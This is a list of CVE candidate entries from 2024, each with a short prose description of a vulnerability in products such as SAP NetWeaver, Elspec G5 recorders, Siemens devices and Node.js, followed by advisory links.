CVE    2024    22126    Candidate    The User Admin application of SAP NetWeaver AS for Java - version 7.50, insufficiently validates and improperly encodes the incoming URL parameters before including them into the redirect URL. This results in Cross-Site Scripting (XSS) vulnerability, leading to a high impact on confidentiality and mild impact on integrity and availability.    MISC:https://me.sap.com/notes/3417627   |   URL:https://me.sap.com/notes/3417627   |   MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html   |   URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html    Assigned (20240105)
CVE    2024    22125    Candidate    Under certain conditions the Microsoft Edge browser extension (SAP GUI connector for Microsoft Edge) - version 1.0, allows an attacker to access highly sensitive information which would otherwise be restricted causing high impact on confidentiality.    MISC:https://me.sap.com/notes/3386378   |   URL:https://me.sap.com/notes/3386378   |   MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html   |   URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html    Assigned (20240105)
CVE    2024    22124    Candidate    Under certain conditions, Internet Communication Manager (ICM) or SAP Web Dispatcher - versions KERNEL 7.22, KERNEL 7.53, KERNEL 7.54, KRNL64UC 7.22, KRNL64UC 7.22EXT, KRNL64UC 7.53, KRNL64NUC 7.22, KRNL64NUC 7.22_EXT, WEBDISP 7.22_EXT, WEBDISP 7.53, WEBDISP 7.54, could allow an attacker to access information which would otherwise be restricted causing high impact on confidentiality.    MISC:https://me.sap.com/notes/3392626   |   URL:https://me.sap.com/notes/3392626   |   MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html   |   URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html    Assigned (20240105)
CVE    2024    22119    Candidate    The cause of vulnerability is improper validation of form input field “Name” on Graph page in Items section.    MISC:https://support.zabbix.com/browse/ZBX-24070   |   URL:https://support.zabbix.com/browse/ZBX-24070    Assigned (20240105)
CVE    2024    22113    Candidate    Open redirect vulnerability in Access analysis CGI An-Analyzer released in 2023 December 31 and earlier allows a remote unauthenticated attacker to redirect users to arbitrary websites and conduct phishing attacks via a specially crafted URL.    MISC:https://jvn.jp/en/jp/JVN73587943/   |   URL:https://jvn.jp/en/jp/JVN73587943/   |   MISC:https://www.anglers-net.com/anlog/update/   |   URL:https://www.anglers-net.com/anlog/update/    Assigned (20240105)
CVE    2024    2211    Candidate    Cross-Site Scripting stored vulnerability in Gophish affecting version 0.12.1. This vulnerability could allow an attacker to store a malicious JavaScript payload in the campaign menu and trigger the payload when the campaign is removed from the menu.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-gophish-admin-panel   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-gophish-admin-panel    Assigned (20240306)
CVE    2024    22108    Candidate    An issue was discovered in GTB Central Console 15.17.1-30814.NG. The method setTermsHashAction at /opt/webapp/lib/PureApi/CCApi.class.php is vulnerable to an unauthenticated SQL injection via /ccapi.php that an attacker can abuse in order to change the Administrator password to a known value.    MISC:https://adepts.of0x.cc/gtbcc-pwned/   |   MISC:https://x-c3ll.github.io/cves.html    Assigned (20240105)
CVE    2024    22107    Candidate    An issue was discovered in GTB Central Console 15.17.1-30814.NG. The method systemSettingsDnsDataAction at /opt/webapp/src/AppBundle/Controller/React/SystemSettingsController.php is vulnerable to command injection via the /old/react/v1/api/system/dns/data endpoint. An authenticated attacker can abuse it to inject an arbitrary command and compromise the platform.    MISC:https://adepts.of0x.cc/gtbcc-pwned/   |   MISC:https://x-c3ll.github.io/cves.html    Assigned (20240105)
CVE    2024    22100    Candidate    MicroDicom DICOM Viewer versions 2023.3 (Build 9342) and prior are affected by a heap-based buffer overflow vulnerability, which could allow an attacker to execute arbitrary code on affected installations of DICOM Viewer. A user must open a malicious DCM file in order to exploit the vulnerability.    MISC:https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-060-01   |   URL:https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-060-01    Assigned (20240212)
CVE    2024    22099    Candidate    NULL Pointer Dereference vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (net, bluetooth modules) allows Overflow Buffers. This vulnerability is associated with program files /net/bluetooth/rfcomm/core.C. This issue affects Linux kernel: v2.6.12-rc2.    FEDORA:FEDORA-2024-5db5954a5e   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSXNF4RLEFLH35BFUQGYXRRVHHUIVBAE/   |   FEDORA:FEDORA-2024-f797f1540e   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IVVYSTEVMPYGF6GDSOD44MUXZXAZHOHB/   |   MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=7956   |   URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=7956    Assigned (20240115)
CVE    2024    22097    Candidate    A double-free vulnerability exists in the BrainVision Header Parsing functionality of The Biosig Project libbiosig Master Branch (ab0ee111) and 2.5.0. A specially crafted .vdhr file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.    MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1917   |   URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1917    Assigned (20240122)
CVE    2024    22096    Candidate    In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, an attacker can append path traversal characters to the filename when using a specific command, allowing them to read arbitrary files from the system.    MISC:https://rapidscada.org/contact/   |   URL:https://rapidscada.org/contact/   |   MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03    Assigned (20240105)
CVE    2024    22093    Candidate    When running in appliance mode, an authenticated remote command injection vulnerability exists in an undisclosed iControl REST endpoint on multi-bladed systems. A successful exploit can allow the attacker to cross a security boundary. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated    MISC:https://my.f5.com/manage/s/article/K000137522   |   URL:https://my.f5.com/manage/s/article/K000137522    Assigned (20240201)
CVE    2024    22088    Candidate    Lotos WebServer through 0.1.1 (commit 3eb36cc) has a use-after-free in buffer_avail() at buffer.h via a long URI, because realloc is mishandled.    MISC:https://github.com/chendotjs/lotos/issues/7    Assigned (20240105)
CVE    2024    22087    Candidate    route in main.c in Pico HTTP Server in C through f3b69a6 has an sprintf stack-based buffer overflow via a long URI, leading to remote code execution.    MISC:https://github.com/foxweb/pico/issues/31    Assigned (20240105)
CVE    2024    22086    Candidate    handle_request in http.c in cherry through 4b877df has an sscanf stack-based buffer overflow via a long URI, leading to remote code execution.    MISC:https://github.com/hayyp/cherry/issues/1    Assigned (20240105)
CVE    2024    22085    Candidate    An issue was discovered in Elspec G5 digital fault recorder versions 1.1.4.15 and before. The shadow file is world readable.    MISC:https://www.elspec-ltd.com/support/security-advisories/    Assigned (20240105)
CVE    2024    22084    Candidate    An issue was discovered in Elspec G5 digital fault recorder versions 1.1.4.15 and before. Cleartext passwords and hashes are exposed through log files.    MISC:https://www.elspec-ltd.com/support/security-advisories/    Assigned (20240105)
CVE    2024    22083    Candidate    An issue was discovered in Elspec G5 digital fault recorder versions 1.1.4.15 and before. A hardcoded backdoor session ID exists that can be used for further access to the device, including reconfiguration tasks.    MISC:https://www.elspec-ltd.com/support/security-advisories/    Assigned (20240105)
CVE    2024    22082    Candidate    An issue was discovered in Elspec G5 digital fault recorder versions 1.1.4.15 and before. Unauthenticated directory listing can occur: the web interface can be abused by an attacker to get a better understanding of the operating system.    MISC:https://www.elspec-ltd.com/support/security-advisories/    Assigned (20240105)
CVE    2024    22081    Candidate    An issue was discovered in Elspec G5 digital fault recorder versions 1.1.4.15 and before. Unauthenticated memory corruption can occur in the HTTP header parsing mechanism.    MISC:https://www.elspec-ltd.com/support/security-advisories/    Assigned (20240105)
CVE    2024    22080    Candidate    An issue was discovered in Elspec G5 digital fault recorder versions 1.1.4.15 and before. Unauthenticated memory corruption can occur during XML body parsing.    MISC:https://www.elspec-ltd.com/support/security-advisories/    Assigned (20240105)
CVE    2024    22079    Candidate    An issue was discovered in Elspec G5 digital fault recorder versions 1.1.4.15 and before. Directory traversal can occur via the system logs download mechanism.    MISC:https://www.elspec-ltd.com/support/security-advisories/    Assigned (20240105)
CVE    2024    22078    Candidate    An issue was discovered in Elspec G5 digital fault recorder versions 1.1.4.15 and before. Privilege escalation can occur via world writable files. The network configuration script has weak filesystem permissions. This results in write access for all authenticated users and the possibility to escalate from user privileges to administrative privileges.    MISC:https://www.elspec-ltd.com/support/security-advisories/    Assigned (20240105)
CVE    2024    22077    Candidate    An issue was discovered in Elspec G5 digital fault recorder versions 1.1.4.15 and before. The SQLite database file has weak permissions.    MISC:https://www.elspec-ltd.com/support/security-advisories/    Assigned (20240105)
CVE    2024    22076    Candidate    MyQ Print Server before 8.2 patch 43 allows remote authenticated administrators to execute arbitrary code via PHP scripts that are reached through the administrative interface.    MISC:https://docs.myq-solution.com/en/print-server/8.2/   |   MISC:https://docs.myq-solution.com/en/print-server/8.2/technical-changelog#id-(8.2)ReleaseNotes-8.2(Patch43)   |   MISC:https://www.access42.nl/nieuws/unmasking-web-vulnerabilities-a-tale-of-default-admin-credentials-and-php-command-execution-cve-2024-22076/    Assigned (20240105)
CVE    2024    22075    Candidate    Firefly III (aka firefly-iii) before 6.1.1 allows webhooks HTML Injection.    MISC:https://github.com/firefly-iii/firefly-iii/releases/tag/v6.1.1    Assigned (20240105)
CVE    2024    22054    Candidate    A malformed discovery packet sent by a malicious actor with preexisting access to the network could interrupt the functionality of device management and discovery. Affected Products: UniFi Access Points UniFi Switches UniFi LTE Backup UniFi Express (Only Mesh Mode, Router mode is not affected) Mitigation: Update UniFi Access Points to Version 6.6.55 or later. Update UniFi Switches to Version 6.6.61 or later. Update UniFi LTE Backup to Version 6.6.57 or later. Update UniFi Express to Version 3.2.5 or later.    MISC:https://community.ui.com/releases/Security-Advisory-Bulletin-037-037/9aeeccef-ca4a-4f10-9f66-1eb400b3d027   |   URL:https://community.ui.com/releases/Security-Advisory-Bulletin-037-037/9aeeccef-ca4a-4f10-9f66-1eb400b3d027    Assigned (20240105)
CVE    2024    22051    Candidate    CommonMarker versions prior to 0.23.4 are at risk of an integer overflow vulnerability. This vulnerability can result in possibly unauthenticated remote attackers to cause heap memory corruption, potentially leading to an information leak or remote code execution, via parsing tables with marker rows that contain more than UINT16_MAX columns.    MISC:https://github.com/advisories/GHSA-fmx4-26r3-wxpf   |   URL:https://github.com/advisories/GHSA-fmx4-26r3-wxpf   |   MISC:https://github.com/github/cmark-gfm/security/advisories/GHSA-mc3g-88wq-6f4x   |   URL:https://github.com/github/cmark-gfm/security/advisories/GHSA-mc3g-88wq-6f4x   |   MISC:https://github.com/gjtorikian/commonmarker/commit/ab4504fd17460627a6ab255bc3c63e8e5fc6aed3   |   URL:https://github.com/gjtorikian/commonmarker/commit/ab4504fd17460627a6ab255bc3c63e8e5fc6aed3   |   MISC:https://github.com/gjtorikian/commonmarker/security/advisories/GHSA-fmx4-26r3-wxpf   |   URL:https://github.com/gjtorikian/commonmarker/security/advisories/GHSA-fmx4-26r3-wxpf   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-fmx4-26r3-wxpf   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-fmx4-26r3-wxpf    Assigned (20240104)
CVE    2024    22050    Candidate    Path traversal in the static file service in Iodine less than 0.7.33 allows an unauthenticated, remote attacker to read files outside the public folder via malicious URLs.    MISC:https://github.com/advisories/GHSA-85rf-xh54-whp3   |   URL:https://github.com/advisories/GHSA-85rf-xh54-whp3   |   MISC:https://github.com/boazsegev/iodine/commit/5558233fb7defda706b4f9c87c17759705949889   |   URL:https://github.com/boazsegev/iodine/commit/5558233fb7defda706b4f9c87c17759705949889   |   MISC:https://github.com/boazsegev/iodine/security/advisories/GHSA-85rf-xh54-whp3   |   URL:https://github.com/boazsegev/iodine/security/advisories/GHSA-85rf-xh54-whp3   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-85rf-xh54-whp3   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-85rf-xh54-whp3    Assigned (20240104)
CVE    2024    22049    Candidate    httparty before 0.21.0 is vulnerable to an assumed-immutable web parameter vulnerability. A remote and unauthenticated attacker can provide a crafted filename parameter during multipart/form-data uploads which could result in attacker controlled filenames being written.    FEDORA:FEDORA-2024-2648dd2e0e   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4LDGAVPR4KB72V4GGQCWODEAI72QZI3V/   |   FEDORA:FEDORA-2024-a5aad4eede   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IOWECZPJY6JZIA5FSBJR77KCRDXWDZDA/   |   MISC:https://github.com/advisories/GHSA-5pq7-52mg-hr42   |   URL:https://github.com/advisories/GHSA-5pq7-52mg-hr42   |   MISC:https://github.com/jnunemaker/httparty/blob/4416141d37fd71bdba4f37589ec265f55aa446ce/lib/httparty/request/body.rb#L43   |   URL:https://github.com/jnunemaker/httparty/blob/4416141d37fd71bdba4f37589ec265f55aa446ce/lib/httparty/request/body.rb#L43   |   MISC:https://github.com/jnunemaker/httparty/commit/cdb45a678c43e44570b4e73f84b1abeb5ec22b8e   |   URL:https://github.com/jnunemaker/httparty/commit/cdb45a678c43e44570b4e73f84b1abeb5ec22b8e   |   MISC:https://github.com/jnunemaker/httparty/security/advisories/GHSA-5pq7-52mg-hr42   |   URL:https://github.com/jnunemaker/httparty/security/advisories/GHSA-5pq7-52mg-hr42   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-5pq7-52mg-hr42   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-5pq7-52mg-hr42   |   MLIST:[debian-lts-announce] 20240123 [SECURITY] [DLA 3716-1] ruby-httparty security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00011.html    Assigned (20240104)
CVE    2024    22048    Candidate    govuk_tech_docs versions from 2.0.2 to before 3.3.1 are vulnerable to a cross-site scripting vulnerability. Malicious JavaScript may be executed in the user's browser if a malicious search result is displayed on the search page.    MISC:https://github.com/advisories/GHSA-x2xw-hw8g-6773   |   URL:https://github.com/advisories/GHSA-x2xw-hw8g-6773   |   MISC:https://github.com/alphagov/tech-docs-gem/pull/323   |   URL:https://github.com/alphagov/tech-docs-gem/pull/323   |   MISC:https://github.com/alphagov/tech-docs-gem/releases/tag/v3.3.1   |   URL:https://github.com/alphagov/tech-docs-gem/releases/tag/v3.3.1   |   MISC:https://github.com/alphagov/tech-docs-gem/security/advisories/GHSA-x2xw-hw8g-6773   |   URL:https://github.com/alphagov/tech-docs-gem/security/advisories/GHSA-x2xw-hw8g-6773   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-x2xw-hw8g-6773   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-x2xw-hw8g-6773    Assigned (20240104)
CVE    2024    22047    Candidate    A race condition exists in Audited 4.0.0 to 5.3.3 that can result in an authenticated user to cause audit log entries to be attributed to another user.    MISC:https://github.com/advisories/GHSA-hjp3-5g2q-7jww   |   URL:https://github.com/advisories/GHSA-hjp3-5g2q-7jww   |   MISC:https://github.com/collectiveidea/audited/issues/601   |   URL:https://github.com/collectiveidea/audited/issues/601   |   MISC:https://github.com/collectiveidea/audited/pull/669   |   URL:https://github.com/collectiveidea/audited/pull/669   |   MISC:https://github.com/collectiveidea/audited/pull/671   |   URL:https://github.com/collectiveidea/audited/pull/671   |   MISC:https://github.com/collectiveidea/audited/security/advisories/GHSA-hjp3-5g2q-7jww   |   URL:https://github.com/collectiveidea/audited/security/advisories/GHSA-hjp3-5g2q-7jww   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-hjp3-5g2q-7jww   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-hjp3-5g2q-7jww    Assigned (20240104)
CVE    2024    22045    Candidate    A vulnerability has been identified in SINEMA Remote Connect Client (All versions < V3.1 SP1). The product places sensitive information into files or directories that are accessible to actors who are allowed to have access to the files, but not to the sensitive information. This information is also available via the web interface of the product.    MISC:https://cert-portal.siemens.com/productcert/html/ssa-653855.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-653855.html    Assigned (20240104)
CVE    2024    22044    Candidate    A vulnerability has been identified in SENTRON 3KC ATC6 Expansion Module Ethernet (3KC9000-8TL75) (All versions). Affected devices expose an unused, unstable http service at port 80/tcp on the Modbus-TCP Ethernet. This could allow an attacker on the same Modbus network to create a denial of service condition that forces the device to reboot.    MISC:https://cert-portal.siemens.com/productcert/html/ssa-918992.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-918992.html    Assigned (20240104)
CVE    2024    22043    Candidate    A vulnerability has been identified in Parasolid V35.0 (All versions < V35.0.251), Parasolid V35.1 (All versions < V35.1.170). The affected applications contain a null pointer dereference vulnerability while parsing specially crafted XT files. An attacker could leverage this vulnerability to crash the application causing denial of service condition.    MISC:https://cert-portal.siemens.com/productcert/html/ssa-797296.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-797296.html    Assigned (20240104)
CVE    2024    22042    Candidate    A vulnerability has been identified in Unicam FX (All versions). The windows installer agent used in affected product contains incorrect use of privileged APIs that trigger the Windows Console Host (conhost.exe) as a child process with SYSTEM privileges. This could be exploited by an attacker to perform a local privilege escalation attack.    MISC:https://cert-portal.siemens.com/productcert/html/ssa-543502.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-543502.html    Assigned (20240104)
CVE    2024    22041    Candidate    A vulnerability has been identified in Cerberus PRO EN Engineering Tool (All versions), Cerberus PRO EN Fire Panel FC72x (All versions < IP8 SR4), Cerberus PRO EN X200 Cloud Distribution (All versions < V4.3.5618), Cerberus PRO EN X300 Cloud Distribution (All versions < V4.3.5617), Sinteso FS20 EN Engineering Tool (All versions), Sinteso FS20 EN Fire Panel FC20 (All versions < MP8 SR4), Sinteso FS20 EN X200 Cloud Distribution (All versions < V4.3.5618), Sinteso FS20 EN X300 Cloud Distribution (All versions < V4.3.5617), Sinteso Mobile (All versions). The network communication library in affected systems improperly handles memory buffers when parsing X.509 certificates. This could allow an unauthenticated remote attacker to crash the network service.    MISC:https://cert-portal.siemens.com/productcert/html/ssa-225840.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-225840.html    Assigned (20240104)
CVE    2024    22040    Candidate    A vulnerability has been identified in Cerberus PRO EN Engineering Tool (All versions), Cerberus PRO EN Fire Panel FC72x (All versions < IP8 SR4), Cerberus PRO EN X200 Cloud Distribution (All versions < V4.3.5618), Cerberus PRO EN X300 Cloud Distribution (All versions < V4.3.5617), Sinteso FS20 EN Engineering Tool (All versions), Sinteso FS20 EN Fire Panel FC20 (All versions < MP8 SR4), Sinteso FS20 EN X200 Cloud Distribution (All versions < V4.3.5618), Sinteso FS20 EN X300 Cloud Distribution (All versions < V4.3.5617), Sinteso Mobile (All versions). The network communication library in affected systems insufficiently validates HMAC values which might result in a buffer overread. This could allow an unauthenticated remote attacker to crash the network service.    MISC:https://cert-portal.siemens.com/productcert/html/ssa-225840.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-225840.html    Assigned (20240104)
CVE    2024    2204    Candidate    Zemana AntiLogger v2.74.204.664 is vulnerable to a Denial of Service (DoS) vulnerability by triggering the 0x80002004 and 0x80002010 IOCTL codes of the zam64.sys and zamguard64.sys drivers.    MISC:https://fluidattacks.com/advisories/hassan/   |   URL:https://fluidattacks.com/advisories/hassan/   |   MISC:https://zemana.com/us/antilogger.html   |   URL:https://zemana.com/us/antilogger.html    Assigned (20240305)
CVE    2024    22039    Candidate    A vulnerability has been identified in Cerberus PRO EN Engineering Tool (All versions < IP8), Cerberus PRO EN Fire Panel FC72x (All versions < IP8), Cerberus PRO EN X200 Cloud Distribution (All versions < V4.0.5016), Cerberus PRO EN X300 Cloud Distribution (All versions < V4.2.5015), Sinteso FS20 EN Engineering Tool (All versions < MP8), Sinteso FS20 EN Fire Panel FC20 (All versions < MP8), Sinteso FS20 EN X200 Cloud Distribution (All versions < V4.0.5016), Sinteso FS20 EN X300 Cloud Distribution (All versions < V4.2.5015), Sinteso Mobile (All versions < V3.0.0). The network communication library in affected systems does not validate the length of certain X.509 certificate attributes which might result in a stack-based buffer overflow. This could allow an unauthenticated remote attacker to execute code on the underlying operating system with root privileges.    MISC:https://cert-portal.siemens.com/productcert/html/ssa-225840.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-225840.html    Assigned (20240104)
CVE    2024    22028    Candidate    Insufficient technical documentation issue exists in thermal camera TMC series all firmware versions. The user of the affected product is not aware of the internally saved data. By accessing the affected product physically, an attacker may retrieve the internal data.    MISC:https://3rrr-btob.jp/archives/news/23624   |   URL:https://3rrr-btob.jp/archives/news/23624   |   MISC:https://jvn.jp/en/jp/JVN96240417/   |   URL:https://jvn.jp/en/jp/JVN96240417/    Assigned (20240104)
CVE    2024    22027    Candidate    Improper input validation vulnerability in WordPress Quiz Maker Plugin prior to 6.5.0.6 allows a remote authenticated attacker to perform a Denial of Service (DoS) attack against external services.    MISC:https://jvn.jp/en/jp/JVN37326856/   |   URL:https://jvn.jp/en/jp/JVN37326856/   |   MISC:https://wordpress.org/plugins/quiz-maker/   |   URL:https://wordpress.org/plugins/quiz-maker/    Assigned (20240104)
CVE    2024    22025    Candidate    A vulnerability in Node.js has been identified, allowing for a Denial of Service (DoS) attack through resource exhaustion when using the fetch() function to retrieve content from an untrusted URL. The vulnerability stems from the fact that the fetch() function in Node.js always decodes Brotli, making it possible for an attacker to cause resource exhaustion when fetching content from an untrusted URL. An attacker controlling the URL passed into fetch() can exploit this vulnerability to exhaust memory, potentially leading to process termination, depending on the system configuration.    MISC:https://hackerone.com/reports/2284065   |   URL:https://hackerone.com/reports/2284065    Assigned (20240104)
CVE    2024    22024    Candidate    An XML external entity or XXE vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x) and ZTA gateways which allows an attacker to access certain restricted resources without authentication.    MISC:https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US   |   URL:https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US    Assigned (20240104)
CVE    2024    22022    Candidate    Vulnerability CVE-2024-22022 allows a Veeam Recovery Orchestrator user that has been assigned a low-privileged role to access the NTLM hash of the service account used by the Veeam Orchestrator Server Service.    MISC:https://veeam.com/kb4541   |   URL:https://veeam.com/kb4541    Assigned (20240104)
CVE    2024    22021    Candidate    Vulnerability CVE-2024-22021 allows a Veeam Recovery Orchestrator user with a low privileged role (Plan Author) to retrieve plans from a Scope other than the one they are assigned to.    MISC:https://veeam.com/kb4541   |   URL:https://veeam.com/kb4541    Assigned (20240104)
CVE    2024    2202    Candidate    The Page Builder by SiteOrigin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the legacy Image widget in all versions up to, and including, 2.29.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/siteorigin-panels/trunk/widgets/widgets.php#L911   |   URL:https://plugins.trac.wordpress.org/browser/siteorigin-panels/trunk/widgets/widgets.php#L911   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3053935%40siteorigin-panels&new=3053935%40siteorigin-panels&sfp_email=&sfph_mail=#file31   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3053935%40siteorigin-panels&new=3053935%40siteorigin-panels&sfp_email=&sfph_mail=#file31   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/52116a6f-506f-4eeb-9bcc-19900ef38101?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/52116a6f-506f-4eeb-9bcc-19900ef38101?source=cve    Assigned (20240305)
CVE    2024    22019    Candidate    A vulnerability in Node.js HTTP servers allows an attacker to send a specially crafted HTTP request with chunked encoding, leading to resource exhaustion and denial of service (DoS). The server reads an unbounded number of bytes from a single connection, exploiting the lack of limitations on chunk extension bytes. The issue can cause CPU and network bandwidth exhaustion, bypassing standard safeguards like timeouts and body size limits.    CONFIRM:https://security.netapp.com/advisory/ntap-20240315-0004/   |   MISC:https://hackerone.com/reports/2233486   |   URL:https://hackerone.com/reports/2233486    Assigned (20240104)
CVE    2024    22017    Candidate    setuid() does not affect libuv's internal io_uring operations if initialized before the call to setuid(). This allows the process to perform privileged operations despite presumably having dropped such privileges through a call to setuid(). This vulnerability affects all users using versions greater than or equal to Node.js 18.18.0, Node.js 20.4.0 and Node.js 21.    MISC:https://hackerone.com/reports/2170226   |   URL:https://hackerone.com/reports/2170226    Assigned (20240104)
CVE    2024    22016    Candidate    In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, an authorized user can write directly to the Scada directory. This may allow privilege escalation.    MISC:https://rapidscada.org/contact/   |   URL:https://rapidscada.org/contact/   |   MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03    Assigned (20240105)
CVE    2024    22011    Candidate    In ss_ProcessRejectComponent of ss_MmConManagement.c, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240103)
CVE    2024    22010    Candidate    In dvfs_plugin_caller of fvp.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240103)
CVE    2024    22008    Candidate    In config_gov_time_windows of tmu.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240103)
CVE    2024    22007    Candidate    In constraint_check of fvp.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240103)
CVE    2024    22006    Candidate    OOB read in the TMU plugin that allows for memory disclosure in the power management subsystem of the device.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240103)
CVE    2024    22005    Candidate    There is a possible Authentication Bypass due to improperly used crypto. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240103)
CVE    2024    21987    Candidate    SnapCenter versions 4.8 prior to 5.0 are susceptible to a vulnerability which could allow an authenticated SnapCenter Server user to modify system logging configuration settings.    MISC:https://security.netapp.com/advisory/ntap-20240216-0001/   |   URL:https://security.netapp.com/advisory/ntap-20240216-0001/    Assigned (20240103)
CVE    2024    21985    Candidate    ONTAP 9 versions prior to 9.9.1P18, 9.10.1P16, 9.11.1P13, 9.12.1P10 and 9.13.1P4 are susceptible to a vulnerability which could allow an authenticated user with multiple remote accounts with differing roles to perform actions via REST API beyond their intended privilege. Possible actions include viewing limited configuration details and metrics or modifying limited settings, some of which could result in a Denial of Service (DoS).    MISC:https://security.netapp.com/advisory/ntap-20240126-0001/   |   URL:https://security.netapp.com/advisory/ntap-20240126-0001/    Assigned (20240103)
CVE    2024    21984    Candidate    StorageGRID (formerly StorageGRID Webscale) versions prior to 11.8 are susceptible to a difficult to exploit Reflected Cross-Site Scripting (XSS) vulnerability. Successful exploit requires the attacker to know specific information about the target instance and trick a privileged user into clicking a specially crafted link. This could allow the attacker to view or modify configuration settings or add or modify user accounts.    MISC:https://security.netapp.com/advisory/ntap-20240216-0013/   |   URL:https://security.netapp.com/advisory/ntap-20240216-0013/    Assigned (20240103)
CVE    2024    21983    Candidate    StorageGRID (formerly StorageGRID Webscale) versions prior to 11.8 are susceptible to a Denial of Service (DoS) vulnerability. Successful exploit by an authenticated attacker could lead to an out of memory condition or node reboot.    MISC:https://security.netapp.com/advisory/ntap-20240216-0012/   |   URL:https://security.netapp.com/advisory/ntap-20240216-0012/    Assigned (20240103)
CVE    2024    21982    Candidate    ONTAP versions 9.4 and higher are susceptible to a vulnerability which when successfully exploited could lead to disclosure of sensitive information to unprivileged attackers when the object-store profiler command is being run by an administrative user.    MISC:https://security.netapp.com/advisory/ntap-20240111-0001/   |   URL:https://security.netapp.com/advisory/ntap-20240111-0001/    Assigned (20240103)
CVE    2024    2197    Candidate    Chirp Access improperly stores credentials within its source code, potentially exposing sensitive information to unauthorized access.    MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-067-01   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-067-01    Assigned (20240305)
